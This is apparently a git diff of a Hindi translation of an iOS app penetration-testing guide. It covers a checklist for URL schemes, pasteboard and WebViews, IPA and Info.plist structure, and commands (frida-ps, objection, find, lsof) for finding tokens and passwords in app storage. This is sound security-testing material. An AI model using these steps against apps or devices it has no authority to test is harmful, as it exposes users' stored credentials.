- [ ] यदि यह [**ऐसी फ़ंक्शन का उपयोग कर रहा है जिसे गतिशील रूप से बायपास किया जा सकता है**](ios-pentesting/#local-authentication-using-keychain) तो आप एक कस्टम फ्रिडा स्क्रिप्ट बना सकते हैं
@ -58,26 +58,26 @@
- [ ] जांचें कि क्या एप्लिकेशन **किसी प्रोटोकॉल/स्कीम को पंजीकृत कर रहा है**
- [ ] जांचें कि क्या एप्लिकेशन **किसी प्रोटोकॉल/स्कीम का उपयोग करने के लिए पंजीकरण कर रहा है**
- [ ] जांचें कि क्या एप्लिकेशन **किसी प्रकार की संवेदनशील जानकारी प्राप्त करने की अपेक्षा कर रहा है** कस्टम स्कीम से जिसे **दूसरे एप्लिकेशन द्वारा इंटरसेप्ट** किया जा सकता है जो समान स्कीम को पंजीकृत कर रहा है
- [ ] जांचें कि क्या एप्लिकेशन **कस्टम स्कीम के माध्यम से उपयोगकर्ता इनपुट की जांच और स्वच्छता नहीं कर रहा है** और कुछ **कमजोरी का लाभ उठाया जा सकता है**
- [ ] जांचें कि क्या एप्लिकेशन **कस्टम स्कीम के माध्यम से उपयोगकर्ता इनपुट की जांच और स्वच्छता नहीं कर रहा है** और कुछ **कमजोरी का शोषण किया जा सकता है**
- [ ] जांचें कि क्या एप्लिकेशन **किसी संवेदनशील क्रिया को उजागर कर रहा है** जिसे कस्टम स्कीम के माध्यम से कहीं से भी कॉल किया जा सकता है
- [**Universal Links**](ios-pentesting/#universal-links)
- [ ] जांचें कि क्या एप्लिकेशन **किसी यूनिवर्सल प्रोटोकॉल/स्कीम को पंजीकृत कर रहा है**
- [ ] `apple-app-site-association` फ़ाइल की जांच करें
- [ ] जांचें कि क्या एप्लिकेशन **कस्टम स्कीम के माध्यम से उपयोगकर्ता इनपुट की जांच और स्वच्छता नहीं कर रहा है** और कुछ **कमजोरी का लाभ उठाया जा सकता है**
- [ ] जांचें कि क्या एप्लिकेशन **कस्टम स्कीम के माध्यम से उपयोगकर्ता इनपुट की जांच और स्वच्छता नहीं कर रहा है** और कुछ **कमजोरी का शोषण किया जा सकता है**
- [ ] जांचें कि क्या एप्लिकेशन **किसी संवेदनशील क्रिया को उजागर कर रहा है** जिसे कस्टम स्कीम के माध्यम से कहीं से भी कॉल किया जा सकता है
- [**UIActivity Sharing**](ios-pentesting/ios-uiactivity-sharing.md)
- [ ] जांचें कि क्या एप्लिकेशन UIActivities प्राप्त कर सकता है और क्या इसे विशेष रूप से तैयार की गई गतिविधि के साथ किसी कमजोरी का लाभ उठाने के लिए संभव है
- [ ] जांचें कि क्या एप्लिकेशन UIActivities प्राप्त कर सकता है और क्या इसे विशेष रूप से तैयार की गई गतिविधि के साथ किसी कमजोरी का शोषण करना संभव है
- [**UIPasteboard**](ios-pentesting/ios-uipasteboard.md)
- [ ] जांचें कि क्या एप्लिकेशन **सामान्य पेस्टबोर्ड में कुछ कॉपी कर रहा है**
- [ ] जांचें कि क्या एप्लिकेशन **सामान्य पेस्टबोर्ड से किसी चीज़ के लिए डेटा का उपयोग कर रहा है**
- [ ] देखें कि क्या कोई **संवेदनशील डेटा कॉपी किया गया है**
- [ ] देखें कि क्या कोई **संवेदनशील डेटा कॉपी किया गया है** पेस्टबोर्ड की निगरानी करें
- [**App Extensions**](ios-pentesting/ios-app-extensions.md)
- [ ] क्या एप्लिकेशन **कोई एक्सटेंशन का उपयोग कर रहा है**?
- [**WebViews**](ios-pentesting/ios-webviews.md)
- [ ] जांचें कि किस प्रकार के वेबव्यू का उपयोग किया जा रहा है
- [ ] **`javaScriptEnabled`**, **`JavaScriptCanOpenWindowsAutomatically`**, **`hasOnlySecureContent`** की स्थिति की जांच करें
- [ ] जांचें कि क्या वेबव्यू **फाइल प्रोटोकॉल** के साथ **स्थानीय फ़ाइलों** तक पहुँच सकता है **file://** **(**`allowFileAccessFromFileURLs`, `allowUniversalAccessFromFileURLs`)
- [ ] जांचें कि क्या जावास्क्रिप्ट **स्थानीय** **विधियों** (`JSContext`, `postMessage`) तक पहुँच सकता है
- [ ] जांचें कि क्या वेबव्यू **फाइल प्रोटोकॉल के साथ स्थानीय फ़ाइलों तक पहुँच सकता है** **file://** **(**`allowFileAccessFromFileURLs`, `allowUniversalAccessFromFileURLs`)
- [ ] जांचें कि क्या जावास्क्रिप्ट **नेटिव** **मेथड्स** (`JSContext`, `postMessage`) तक पहुँच सकता है
### Network Communication

112
src/mobile-pentesting/ios-pentesting/README.md
View File

@ -135,11 +135,11 @@ grep -iER "_vsprintf"
### Basic Dynamic Analysis
देखें कि [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) क्या गतिशील विश्लेषण करता है। आपको विभिन्न दृश्य के माध्यम से नेविगेट करना होगा और उनके साथ इंटरैक्ट करना होगा, लेकिन यह अन्य चीजें करते समय कई कक्षाओं को हुक करेगा और जब आप समाप्त हो जाएंगे तो एक रिपोर्ट तैयार करेगा।
देखें कि [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) द्वारा किया गया गतिशील विश्लेषण। आपको विभिन्न दृश्य के माध्यम से नेविगेट करना होगा और उनके साथ इंटरैक्ट करना होगा, लेकिन यह अन्य चीजें करते समय कई कक्षाओं को हुक करेगा और जब आप समाप्त हो जाएंगे तो एक रिपोर्ट तैयार करेगा।
### Listing Installed Apps
स्थापित ऐप्स के **bundle identifier** निर्धारित करने के लिए `frida-ps -Uai` कमांड का उपयोग करें:
स्थापित ऐप्स के **बंडल पहचानकर्ता** का निर्धारण करने के लिए `frida-ps -Uai` कमांड का उपयोग करें:
```bash
$ frida-ps -Uai
PID Name Identifier
@ -162,13 +162,13 @@ ios-hooking-with-objection.md
### IPA Structure
एक **IPA फ़ाइल** की संरचना मूल रूप से एक **ज़िप पैकेज** की होती है। इसके एक्सटेंशन को `.zip` में बदलकर, इसे **डिकंप्रेस** किया जा सकता है ताकि इसके सामग्री को प्रकट किया जा सके। इस संरचना के भीतर, एक **Bundle** एक पूरी तरह से पैक की गई ऐप्लिकेशन का प्रतिनिधित्व करता है जो इंस्टॉलेशन के लिए तैयार है। इसके अंदर, आपको `<NAME>.app` नामक एक निर्देशिका मिलेगी, जो ऐप्लिकेशन के संसाधनों को संलग्न करती है।
एक **IPA फ़ाइल** की संरचना मूल रूप से एक **ज़िप पैकेज** की होती है। इसके एक्सटेंशन को `.zip` में बदलकर, इसे **डिकंप्रेस** किया जा सकता है ताकि इसके सामग्री को प्रकट किया जा सके। इस संरचना के भीतर, एक **Bundle** एक पूरी तरह से पैक किया गया ऐप्लिकेशन है जो इंस्टॉलेशन के लिए तैयार है। इसके अंदर, आपको `<NAME>.app` नामक एक निर्देशिका मिलेगी, जो ऐप्लिकेशन के संसाधनों को संलग्न करती है।
- **`Info.plist`**: यह फ़ाइल ऐप्लिकेशन के विशिष्ट कॉन्फ़िगरेशन विवरण रखती है।
- **`_CodeSignature/`**: यह निर्देशिका एक plist फ़ाइल शामिल करती है जिसमें एक हस्ताक्षर होता है, जो बंडल में सभी फ़ाइलों की अखंडता सुनिश्चित करता है।
- **`Assets.car`**: एक संकुचित संग्रह जो आइकनों जैसी संपत्ति फ़ाइलों को संग्रहीत करता है।
- **`Frameworks/`**: यह फ़ोल्डर ऐप्लिकेशन की मूलभूत पुस्तकालयों को रखता है, जो `.dylib` या `.framework` फ़ाइलों के रूप में हो सकते हैं।
- **`PlugIns/`**: इसमें ऐप्लिकेशन के लिए एक्सटेंशन शामिल हो सकते हैं, जिन्हें `.appex` फ़ाइलें कहा जाता है, हालांकि ये हमेशा मौजूद नहीं होते हैं। \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): इसका उपयोग आपके ऐप्लिकेशन के स्थायी डेटा को ऑफ़लाइन उपयोग के लिए, अस्थायी डेटा को कैश करने के लिए, और एकल डिवाइस पर आपके ऐप में पूर्ववत कार्यक्षमता जोड़ने के लिए किया जाता है। एक ही iCloud खाते में कई उपकरणों के बीच डेटा को समन्वयित करने के लिए, Core Data स्वचालित रूप से आपके स्कीमा को एक CloudKit कंटेनर में मिरर करता है।
- **`PlugIns/`**: इसमें ऐप्लिकेशन के लिए एक्सटेंशन शामिल हो सकते हैं, जिन्हें `.appex` फ़ाइलें कहा जाता है, हालांकि ये हमेशा मौजूद नहीं होते हैं। \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): इसका उपयोग आपके ऐप्लिकेशन के स्थायी डेटा को ऑफ़लाइन उपयोग के लिए, अस्थायी डेटा को कैश करने के लिए, और एकल डिवाइस पर आपके ऐप में पूर्ववत कार्यक्षमता जोड़ने के लिए किया जाता है। एक iCloud खाते में कई उपकरणों के बीच डेटा को समन्वयित करने के लिए, Core Data स्वचालित रूप से आपके स्कीमा को एक CloudKit कंटेनर में मिरर करता है।
- [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): `PkgInfo` फ़ाइल आपके ऐप्लिकेशन या बंडल के प्रकार और निर्माता कोड निर्दिष्ट करने का एक वैकल्पिक तरीका है।
- **en.lproj, fr.proj, Base.lproj**: ये भाषा पैक हैं जो उन विशिष्ट भाषाओं के लिए संसाधन शामिल करते हैं, और यदि कोई भाषा समर्थित नहीं है तो एक डिफ़ॉल्ट संसाधन।
- **Security**: `_CodeSignature/` निर्देशिका ऐप की सुरक्षा में एक महत्वपूर्ण भूमिका निभाती है, सभी बंडल की गई फ़ाइलों की अखंडता को डिजिटल हस्ताक्षरों के माध्यम से सत्यापित करती है।
@ -178,9 +178,9 @@ ios-hooking-with-objection.md
**Info.plist**
**Info.plist** iOS ऐप्लिकेशनों के लिए एक आधारशिला के रूप में कार्य करता है, **की-मान** जोड़ों के रूप में प्रमुख कॉन्फ़िगरेशन डेटा को संलग्न करता है। यह फ़ाइल न केवल ऐप्लिकेशनों के लिए बल्कि ऐप एक्सटेंशन और बंडल में शामिल फ्रेमवर्क के लिए भी आवश्यक है। इसे XML या बाइनरी प्रारूप में संरचित किया गया है और इसमें ऐप अनुमतियों से लेकर सुरक्षा कॉन्फ़िगरेशन तक महत्वपूर्ण जानकारी होती है। उपलब्ध कुंजियों की विस्तृत खोज के लिए, कोई [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc) का संदर्भ ले सकता है।
**Info.plist** iOS ऐप्लिकेशनों के लिए एक आधारशिला के रूप में कार्य करता है, **की-मान** जोड़ों के रूप में प्रमुख कॉन्फ़िगरेशन डेटा को संलग्न करता है। यह फ़ाइल न केवल ऐप्लिकेशनों के लिए बल्कि ऐप एक्सटेंशन और बंडल में शामिल फ्रेमवर्क के लिए भी आवश्यक है। यह XML या बाइनरी प्रारूप में संरचित होती है और ऐप की अनुमतियों से लेकर सुरक्षा कॉन्फ़िगरेशन तक महत्वपूर्ण जानकारी रखती है। उपलब्ध कुंजियों की विस्तृत खोज के लिए, कोई [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc) का संदर्भ ले सकता है।
जो लोग इस फ़ाइल के साथ अधिक सुलभ प्रारूप में काम करना चाहते हैं, उनके लिए XML रूपांतरण को macOS पर `plutil` का उपयोग करके आसानी से प्राप्त किया जा सकता है (संस्करण 10.2 और बाद में स्वदेशी रूप से उपलब्ध) या Linux पर `plistutil` का उपयोग करके। रूपांतरण के लिए आदेश इस प्रकार हैं:
जो लोग इस फ़ाइल के साथ अधिक सुलभ प्रारूप में काम करना चाहते हैं, उनके लिए XML रूपांतरण को macOS पर `plutil` का उपयोग करके आसानी से प्राप्त किया जा सकता है (जो संस्करण 10.2 और बाद में स्वदेशी रूप से उपलब्ध है) या Linux पर `plistutil` का उपयोग करके। रूपांतरण के लिए आदेश इस प्रकार हैं:
- **For macOS**:
```bash
@ -191,7 +191,7 @@ $ plutil -convert xml1 Info.plist
$ apt install libplist-utils
$ plistutil -i Info.plist -o Info_xml.plist
```
**Info.plist** फ़ाइल जो जानकारी प्रकट कर सकती है, उनमें प्रमुख प्रविष्टियाँ ऐप अनुमति स्ट्रिंग्स (`UsageDescription`), कस्टम URL स्कीम्स (`CFBundleURLTypes`), और ऐप ट्रांसपोर्ट सुरक्षा के लिए कॉन्फ़िगरेशन (`NSAppTransportSecurity`) शामिल हैं। ये प्रविष्टियाँ, साथ ही निर्यातित/आयातित कस्टम दस्तावेज़ प्रकार (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`) जैसी अन्य प्रविष्टियाँ, फ़ाइल का निरीक्षण करके या एक साधारण `grep` कमांड का उपयोग करके आसानी से स्थित की जा सकती हैं:
**Info.plist** फ़ाइल जो जानकारी प्रकट कर सकती है, उनमें प्रमुख प्रविष्टियाँ शामिल हैं जैसे ऐप अनुमति स्ट्रिंग्स (`UsageDescription`), कस्टम URL स्कीम्स (`CFBundleURLTypes`), और ऐप ट्रांसपोर्ट सुरक्षा के लिए कॉन्फ़िगरेशन (`NSAppTransportSecurity`)। ये प्रविष्टियाँ, साथ ही निर्यातित/आयातित कस्टम दस्तावेज़ प्रकार (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`) जैसी अन्य प्रविष्टियाँ, फ़ाइल का निरीक्षण करके या एक साधारण `grep` कमांड का उपयोग करके आसानी से स्थित की जा सकती हैं:
```bash
$ grep -i <keyword> Info.plist
```
@ -202,7 +202,7 @@ iOS वातावरण में, निर्देशिकाएँ वि
> [!WARNING]
> चूंकि iOS में अनुप्रयोगों को सैंडबॉक्स किया जाना चाहिए, प्रत्येक ऐप के पास **`$HOME/Library/Containers`** के अंदर एक फ़ोल्डर भी होगा जिसका नाम ऐप का **`CFBundleIdentifier`** होगा।
>
> हालाँकि, दोनों फ़ोल्डर (डेटा और कंटेनर फ़ोल्डर) में फ़ाइल **`.com.apple.mobile_container_manager.metadata.plist`** होती है जो `MCMetadataIdentifier` कुंजी में दोनों फ़ाइलों को लिंक करती है।
> हालाँकि, दोनों फ़ोल्डर (डेटा और कंटेनर फ़ोल्डर) में फ़ाइल **`.com.apple.mobile_container_manager.metadata.plist`** होती है जो दोनों फ़ाइलों को कुंजी `MCMetadataIdentifier` में लिंक करती है।
उपयोगकर्ता-स्थापित ऐप के स्थापना निर्देशिका की खोज को सुविधाजनक बनाने के लिए, **objection tool** एक उपयोगी कमांड, `env` प्रदान करता है। यह कमांड संबंधित ऐप के लिए विस्तृत निर्देशिका जानकारी प्रकट करता है। नीचे इस कमांड का उपयोग करने का एक उदाहरण दिया गया है:
```bash
@ -219,7 +219,7 @@ LibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8E
```bash
find /private/var/containers -name "Progname*"
```
कमांड जैसे `ps` और `lsof` का उपयोग ऐप के प्रोसेस की पहचान करने और क्रमशः खुले फ़ाइलों की सूची बनाने के लिए किया जा सकता है, जो ऐप्लिकेशन के सक्रिय डायरेक्टरी पथों के बारे में जानकारी प्रदान करते हैं:
कमांड जैसे `ps` और `lsof` का उपयोग ऐप के प्रोसेस की पहचान करने और क्रमशः खुले फ़ाइलों की सूची बनाने के लिए किया जा सकता है, जो ऐप्लिकेशन के सक्रिय डायरेक्टरी पाथ्स के बारे में जानकारी प्रदान करते हैं:
```bash
ps -ef | grep -i <app-name>
lsof -p <pid> | grep -i "/containers" | head -n 1
@ -254,7 +254,7 @@ lsof -p <pid> | grep -i "/containers" | head -n 1
- ऐप `NSURLIsExcludedFromBackupKey` सेट करके पथों को अक्षम कर सकता है।
- **Library/Preferences/**
- इसका उपयोग उन प्रॉपर्टीज को स्टोर करने के लिए किया जाता है जो **ऐप्लिकेशन के पुनरारंभ होने के बाद भी बनी रह सकती हैं**
- जानकारी बिना एन्क्रिप्ट किए, एप्लिकेशन सैंडबॉक्स के अंदर एक plist फ़ाइल में \[BUNDLE_ID].plist के रूप में सहेजी जाती है।
- जानकारी, बिना एन्क्रिप्ट किए, एप्लिकेशन सैंडबॉक्स के अंदर एक plist फ़ाइल में \[BUNDLE_ID].plist के रूप में सहेजी जाती है।
- `NSUserDefaults` का उपयोग करके संग्रहीत सभी कुंजी/मान जोड़े इस फ़ाइल में पाए जा सकते हैं।
- **tmp/**
- इस निर्देशिका का उपयोग **अस्थायी फ़ाइलें** लिखने के लिए करें जिन्हें ऐप लॉन्च के बीच में बने रहने की आवश्यकता नहीं है।
@ -279,7 +279,7 @@ Regular 420 None ... README.txt
```
### बाइनरी रिवर्सिंग
`<application-name>.app` फ़ोल्डर के अंदर आपको `<application-name>` नामक एक बाइनरी फ़ाइल मिलेगी। यह वही फ़ाइल है जो **निष्पादित** की जाएगी। आप टूल **`otool`** के साथ बाइनरी का एक बुनियादी निरीक्षण कर सकते हैं:
Inside the `<application-name>.app` folder you will find a binary file called `<application-name>`. This is the file that will be **executed**. You can perform a basic inspection of the binary with the tool **`otool`**:
```bash
otool -Vh DVIA-v2 #Check some compilation attributes
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
@ -367,19 +367,19 @@ ios-basics.md
> [!WARNING]
> जानकारी संग्रहित करने के लिए निम्नलिखित स्थानों की जांच **ऐप्लिकेशन स्थापित करने के तुरंत बाद**, **ऐप्लिकेशन की सभी कार्यक्षमताओं की जांच करने के बाद** और यहां तक कि **एक उपयोगकर्ता से लॉगआउट करने और एक अलग में लॉगिन करने के बाद** की जानी चाहिए।\
> लक्ष्य है **अनसुरक्षित संवेदनशील जानकारी** खोजना (पासवर्ड, टोकन), वर्तमान उपयोगकर्ता और पूर्व में लॉगिन किए गए उपयोगकर्ताओं की।
> लक्ष्य है **अनसुरक्षित संवेदनशील जानकारी** खोजना (पासवर्ड, टोकन), वर्तमान उपयोगकर्ता की और पहले लॉगिन किए गए उपयोगकर्ताओं की।
### Plist
**plist** फ़ाइलें संरचित XML फ़ाइलें हैं जो **की-मान जोड़े** रखती हैं। यह स्थायी डेटा संग्रहित करने का एक तरीका है, इसलिए कभी-कभी आप इन फ़ाइलों में **संवेदनशील जानकारी** पा सकते हैं। ऐप स्थापित करने के बाद और इसका उपयोग करने के बाद इन फ़ाइलों की जांच करने की सिफारिश की जाती है कि क्या नए डेटा लिखे गए हैं
**plist** फ़ाइलें संरचित XML फ़ाइलें हैं जो **की-मान जोड़े** रखती हैं। यह स्थायी डेटा संग्रहित करने का एक तरीका है, इसलिए कभी-कभी आप इन फ़ाइलों में **संवेदनशील जानकारी** पा सकते हैं। ऐप स्थापित करने के बाद और इसका गहन उपयोग करने के बाद इन फ़ाइलों की जांच करने की सिफारिश की जाती है कि क्या नया डेटा लिखा गया है
plist फ़ाइलों में डेटा को स्थायी रूप से रखने का सबसे सामान्य तरीका **NSUserDefaults** का उपयोग करना है। यह plist फ़ाइल ऐप सैंडबॉक्स के अंदर **`Library/Preferences/<appBundleID>.plist`** में सहेजी जाती है।
plist फ़ाइलों में डेटा को स्थायी रूप से संग्रहित करने का सबसे सामान्य तरीका **NSUserDefaults** का उपयोग करना है। यह plist फ़ाइल ऐप सैंडबॉक्स के अंदर **`Library/Preferences/<appBundleID>.plist`** में सहेजी जाती है।
[`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) क्लास डिफ़ॉल्ट सिस्टम के साथ इंटरैक्ट करने के लिए एक प्रोग्रामेटिक इंटरफ़ेस प्रदान करती है। डिफ़ॉल्ट सिस्टम एक एप्लिकेशन को **उपयोगकर्ता प्राथमिकताओं** के अनुसार अपने व्यवहार को अनुकूलित करने की अनुमति देता है। `NSUserDefaults` द्वारा सहेजा गया डेटा एप्लिकेशन बंडल में देखा जा सकता है। यह क्लास **plist** **फ़ाइल** में **डेटा** संग्रहित करती है, लेकिन इसका उपयोग छोटे मात्रा में डेटा के साथ किया जाना चाहिए
[`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) क्लास डिफ़ॉल्ट सिस्टम के साथ इंटरैक्ट करने के लिए एक प्रोग्रामेटिक इंटरफ़ेस प्रदान करती है। डिफ़ॉल्ट सिस्टम एक एप्लिकेशन को **उपयोगकर्ता प्राथमिकताओं** के अनुसार अपने व्यवहार को अनुकूलित करने की अनुमति देता है। `NSUserDefaults` द्वारा सहेजा गया डेटा एप्लिकेशन बंडल में देखा जा सकता है। यह क्लास **plist** **फ़ाइल** में **डेटा** संग्रहित करती है, लेकिन इसे छोटे मात्रा में डेटा के साथ उपयोग करने के लिए डिज़ाइन किया गया है
इस डेटा को सीधे एक विश्वसनीय कंप्यूटर के माध्यम से अधिक समय तक एक्सेस नहीं किया जा सकता है, लेकिन इसे **बैकअप** करके एक्सेस किया जा सकता है।
आप **`NSUserDefaults`** का उपयोग करके सहेजी गई जानकारी को objection के `ios nsuserdefaults get` का उपयोग करके **डंप** कर सकते हैं
आप **`NSUserDefaults`** का उपयोग करके सहेजे गए जानकारी को **dump** कर सकते हैं, जिसका उपयोग objection के `ios nsuserdefaults get` से किया जा सकता है
ऐप्लिकेशन द्वारा उपयोग की जाने वाली सभी plist फ़ाइलों को खोजने के लिए आप `/private/var/mobile/Containers/Data/Application/{APPID}` पर जा सकते हैं और चलाएं:
```bash
@ -402,7 +402,7 @@ ios plist cat /private/var/mobile/Containers/Data/Application/<Application-UUID>
```
### Core Data
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) आपके एप्लिकेशन में ऑब्जेक्ट्स के मॉडल लेयर को प्रबंधित करने के लिए एक ढांचा है। [Core Data SQLite का उपयोग अपने स्थायी स्टोर के रूप में कर सकता है](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), लेकिन ढांचा स्वयं एक डेटाबेस नहीं है।\
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) आपके एप्लिकेशन में ऑब्जेक्ट्स के मॉडल लेयर को प्रबंधित करने के लिए एक ढांचा है। [Core Data अपने स्थायी स्टोर के रूप में SQLite का उपयोग कर सकता है](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), लेकिन ढांचा स्वयं एक डेटाबेस नहीं है।\
CoreData डिफ़ॉल्ट रूप से अपने डेटा को एन्क्रिप्ट नहीं करता है। हालाँकि, CoreData में एक अतिरिक्त एन्क्रिप्शन लेयर जोड़ी जा सकती है। अधिक विवरण के लिए [GitHub Repo](https://github.com/project-imas/encrypted-core-data) देखें।
आप किसी एप्लिकेशन की SQLite Core Data जानकारी को पथ `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` में पा सकते हैं।
@ -434,17 +434,17 @@ NSLog(@"data stored in core data");
### YapDatabase
[YapDatabase](https://github.com/yapstudios/YapDatabase) एक की/मान भंडार है जो SQLite के ऊपर बनाया गया है।\
चूंकि Yap डेटाबेस sqlite डेटाबेस हैं, आप उन्हें पिछले अनुभाग में दिए गए कमांड का उपयोग करके खोज सकते हैं।
चूंकि Yap डेटाबेस SQLite डेटाबेस हैं, आप उन्हें पिछले अनुभाग में दिए गए कमांड का उपयोग करके खोज सकते हैं।
### Other SQLite Databases
यह सामान्य है कि एप्लिकेशन अपने स्वयं के sqlite डेटाबेस बनाते हैं। वे उन पर **संवेदनशील** **डेटा** **स्टोर** कर सकते हैं और इसे एन्क्रिप्ट नहीं कर सकते। इसलिए, हमेशा एप्लिकेशन के निर्देशिका में हर डेटाबेस की जांच करना दिलचस्प होता है। इसलिए उस एप्लिकेशन निर्देशिका में जाएं जहां डेटा सहेजा गया है (`/private/var/mobile/Containers/Data/Application/{APPID}`)
यह सामान्य है कि एप्लिकेशन अपने स्वयं के SQLite डेटाबेस बनाते हैं। वे उन पर **संवेदनशील** **डेटा** **स्टोर** कर सकते हैं और इसे एन्क्रिप्ट नहीं कर सकते। इसलिए, हमेशा एप्लिकेशन के निर्देशिका में हर डेटाबेस की जांच करना दिलचस्प होता है। इसलिए उस एप्लिकेशन निर्देशिका में जाएं जहां डेटा सहेजा गया है (`/private/var/mobile/Containers/Data/Application/{APPID}`)
```bash
find ./ -name "*.sqlite" -or -name "*.db"
```
### Firebase Real-Time Databases
डेवलपर्स को **डेटा स्टोर और सिंक करने** की अनुमति मिलती है **NoSQL क्लाउड-होस्टेड डेटाबेस** के माध्यम से Firebase Real-Time Databases में। JSON प्रारूप में स्टोर किया गया डेटा सभी जुड़े हुए क्लाइंट्स के लिए वास्तविक समय में समन्वयित होता है।
डेवलपर्स को **डेटा स्टोर और सिंक करने** की अनुमति मिलती है **NoSQL क्लाउड-होस्टेड डेटाबेस** के माध्यम से Firebase Real-Time Databases में। JSON प्रारूप में स्टोर किया गया डेटा सभी जुड़े हुए क्लाइंट्स के साथ वास्तविक समय में समन्वयित होता है।
आप यहाँ गलत कॉन्फ़िगर किए गए Firebase डेटाबेस की जांच कैसे करें, यह पा सकते हैं:
@ -454,7 +454,7 @@ find ./ -name "*.sqlite" -or -name "*.db"
### Realm databases
[Realm Objective-C](https://realm.io/docs/objc/latest/) और [Realm Swift](https://realm.io/docs/swift/latest/) डेटा स्टोरेज के लिए एक शक्तिशाली विकल्प प्रदान करते हैं, जो Apple द्वारा प्रदान नहीं किया गया है। डिफ़ॉल्ट रूप से, वे **डेटा को अनएन्क्रिप्टेड** स्टोर करते हैं, जिसमें विशिष्ट कॉन्फ़िगरेशन के माध्यम से एन्क्रिप्शन उपलब्ध है।
[Realm Objective-C](https://realm.io/docs/objc/latest/) और [Realm Swift](https://realm.io/docs/swift/latest/) डेटा स्टोरेज के लिए एक शक्तिशाली विकल्प प्रदान करते हैं, जो Apple द्वारा प्रदान नहीं किया गया है। डिफ़ॉल्ट रूप से, वे **डेटा को अनएन्क्रिप्टेड** स्टोर करते हैं, विशेष कॉन्फ़िगरेशन के माध्यम से एन्क्रिप्शन उपलब्ध है।
डेटाबेस निम्नलिखित स्थान पर स्थित हैं: `/private/var/mobile/Containers/Data/Application/{APPID}`। इन फ़ाइलों का अन्वेषण करने के लिए, कोई कमांड का उपयोग कर सकता है:
```bash
@ -479,7 +479,7 @@ fatalError("Error opening realm: \(error)")
```
### Couchbase Lite Databases
[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) को एक **हल्का** और **एंबेडेड** डेटाबेस इंजन के रूप में वर्णित किया गया है जो **डॉक्यूमेंट-ओरिएंटेड** (NoSQL) दृष्टिकोण का पालन करता है। इसे **iOS** और **macOS** के लिए मूल रूप से डिज़ाइन किया गया है, यह डेटा को सहजता से सिंक करने की क्षमता प्रदान करता है।
[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) को एक **हल्का** और **एंबेडेड** डेटाबेस इंजन के रूप में वर्णित किया गया है जो **डॉक्यूमेंट-ओरिएंटेड** (NoSQL) दृष्टिकोण का पालन करता है। इसे **iOS** और **macOS** के लिए मूल रूप से डिज़ाइन किया गया है, यह डेटा को निर्बाध रूप से समन्वयित करने की क्षमता प्रदान करता है।
डिवाइस पर संभावित Couchbase डेटाबेस की पहचान करने के लिए, निम्नलिखित निर्देशिका की जांच की जानी चाहिए:
```bash
@ -508,9 +508,9 @@ iOS ऐप्स की कुकीज़ को प्रत्येक ऐ
```
### Cache
डिफ़ॉल्ट रूप से NSURLSession डेटा को स्टोर करता है, जैसे कि **HTTP अनुरोध और प्रतिक्रियाएँ Cache.db** डेटाबेस में। यह डेटाबेस **संवेदनशील डेटा** रख सकता है, यदि टोकन, उपयोगकर्ता नाम या कोई अन्य संवेदनशील जानकारी कैश की गई है। कैश की गई जानकारी खोजने के लिए ऐप के डेटा निर्देशिका को खोलें (`/var/mobile/Containers/Data/Application/<UUID>`) और `/Library/Caches/<Bundle Identifier>` पर जाएं। **WebKit कैश भी Cache.db** फ़ाइल में स्टोर किया जा रहा है। **Objection** इस डेटाबेस को `sqlite connect Cache.db`मांड के साथ खोल और इंटरैक्ट कर सकता है, क्योंकि यह एक **सामान्य SQLite डेटाबेस** है।
डिफ़ॉल्ट रूप से NSURLSession डेटा को स्टोर करता है, जैसे कि **HTTP अनुरोध और प्रतिक्रियाएँ Cache.db** डेटाबेस में। यह डेटाबेस **संवेदनशील डेटा** रख सकता है, यदि टोकन, उपयोगकर्ता नाम या कोई अन्य संवेदनशील जानकारी कैश की गई है। कैश की गई जानकारी खोजने के लिए ऐप के डेटा निर्देशिका को खोलें (`/var/mobile/Containers/Data/Application/<UUID>`) और `/Library/Caches/<Bundle Identifier>` पर जाएं। **WebKit कैश भी Cache.db** फ़ाइल में स्टोर किया जा रहा है। **Objection** इस डेटाबेस को खोल सकता है और कमांड `sqlite connect Cache.db` के साथ इंटरैक्ट कर सकता है, क्योंकि यह एक **सामान्य SQLite डेटाबेस** है।
यह **सिफारिश की जाती है कि इस डेटा को कैशिंग बंद कर दिया जाए**, क्योंकि इसमें अनुरोध या प्रतिक्रिया में संवेदनशील जानकारी हो सकती है। नीचे दी गई सूची विभिन्न तरीकों को दिखाती है जिससे यह प्राप्त किया जा सकता है:
यह **सिफारिश की जाती है कि इस डेटा को कैशिंग बंद कर दिया जाए**, क्योंकि इसमें अनुरोध या प्रतिक्रिया में संवेदनशील जानकारी हो सकती है। नीचे दी गई सूची विभिन्न तरीकों को दिखाती है जिससे इसे प्राप्त किया जा सकता है:
1. सिफारिश की जाती है कि लॉगआउट के बाद कैश की गई प्रतिक्रियाएँ हटा दी जाएँ। यह Apple द्वारा प्रदान की गई विधि [`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses) के साथ किया जा सकता है। आप इस विधि को इस प्रकार कॉल कर सकते हैं:
@ -520,7 +520,7 @@ iOS ऐप्स की कुकीज़ को प्रत्येक ऐ
